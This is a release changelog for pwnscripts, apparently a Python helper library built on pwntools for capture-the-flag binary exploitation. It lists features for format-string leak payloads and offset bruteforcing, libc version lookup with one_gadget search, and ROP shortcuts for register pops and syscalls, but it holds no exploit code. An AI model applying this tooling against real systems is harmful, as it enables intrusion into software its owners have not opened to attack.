Pwnscripts

Latest version: v0.6.0

Safety actively analyzes 682449 Python packages for vulnerabilities to keep your Python projects secure.

Scan your dependencies

Page 1 of 2

2008.1

NEW: printf() functions are now kept under the `pwnscripts.fsb` module. Older prototypes for find_printf_* functions remain available for now.

Addition of a lot of docstrings, plus example binaries.

**20-08**

Added a lot of whitespace.

Added a wrapper object for libc-database: the `libc_db` object. This is mostly a reinvention of tools like `LibcSearcher`, although I have yet to see another project tack on `one_gadget` searching, which is a (hacky) feature added for `libc_db`.

Minor adjustments to *printf*. Logging is suppressed for offset bruteforcing; new feature to make a leak payload.

Extended readme.

**20-06**

Added module packaging stuff, so that `pip install -e .` works

You can now see a test example of this library in `test.py`.

0.6.0

Changes
Most changes are listed under the v0.5.*dev headers. Other changes include:
* updating the README.md to match many new features
* automated tests have been cleaned up & categorised

0.5.2dev

Changes
New
* Assigning values to ELF.symbols[] will automagically update ELF.address.
* Note: as with prior ELF/context updates, the magic here can't sync with internal pwntools methods that reference `pwnlib.elf.elf.ELF`.
* Tests have been updated to reflect this
* `fsb-cache` will automatically detect different libc versions && differentiate remote vs. local bruteforce attempts.
* `context.is_local` to check if the most recently opened tube is local/remote. This involves monkeypatching for `ELF()` and `remote()`; there are a number of cases where `.is_local` will fail to update properly.
Internal changes
* `libc()` will now catch discrepancies between pwntools-provided binary offsets and libc-database offsets, raising a debug log if things go wrong.
* increase the number of TODOs
* pylint whitespace

0.5.1dev

Changes
New
* `fsb.find_offset.<>()` will store a **cache** of leaked printf values.
* Use `fsb.find_offset.flush_cache()` if anything goes wrong.
* `README.md` has been updated appropriately.
* `libc.run_with()` now has an argument for process constructor overridding.

Internal changes
* `__all__` has been added to most source files to prevent namespace leaking.
* Version history has been shifted to its [own separate file](CHANGELOG.md)
* Efforts have been made to clean up code using pylint

0.5.0

Changes
* `string_checks` has been refactored:
* `string_checks` itself is now named `util`
* `is_X_address` functions have been renamed to `is_addr.X`
* `extract_*` functions have been renamed to `unpack_*`
* `libc_db()` from v0.1 is now fully removed from pwnscripts.
* bugfixes for fsb.leak module

0.4.0

Changes
New
* `ROP.pop` && `ROP.system_call` overhaul
* Use `ROP.pop.<reg>(value)` to pop a single register ASAP
* `ROP.system_call.<func>(args)` is a similar shortcut
* `ROP.system_call(id, ...)` will now accept a `str` for `id` (where `id` is the name of the syscall)
* These changes mean that `help()` is essentially broken for these functions. In lieu of that, more docstrings!
* Added a test for these changes
Internal changes
* Some of the TODOs have been extended with short outlines

Page 1 of 2

© 2024 Safety CLI Cybersecurity Inc. All Rights Reserved.